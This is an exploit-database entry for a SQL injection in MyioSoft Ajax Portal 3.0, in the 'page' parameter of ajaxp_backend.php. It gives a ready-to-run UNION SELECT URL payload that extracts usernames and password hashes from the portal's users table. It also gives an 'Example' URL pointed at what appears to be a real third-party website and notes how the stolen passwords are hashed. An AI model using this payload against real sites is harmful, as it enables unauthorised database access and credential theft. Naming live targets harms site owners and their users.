MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability

2009-04-01T00:00:00
ID 1337DAY-ID-4987
Type zdt
Reporter cOndemned
Modified 2009-04-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
MyioSoft Ajax Portal 3.0 (page) SQL Injection Vulnerability
===========================================================


AjaxPortal 3.0 (ajaxp_backend.php page) Remote SQL Injection Vulnerability
Bug found && Exploited by cOndemned

Proof of Concept : http://[host]/[ajaxportal-3.0_path]/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+PREFIX_users--

Example : http://calmpc.net/ajaxp_backend.php?page=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7+from+dbPfixajaxp_users--


Passwords are encoded using MySQL PASSWORD() function. (used algorithm depends on MySQL version.)



#  0day.today [2018-04-12]  #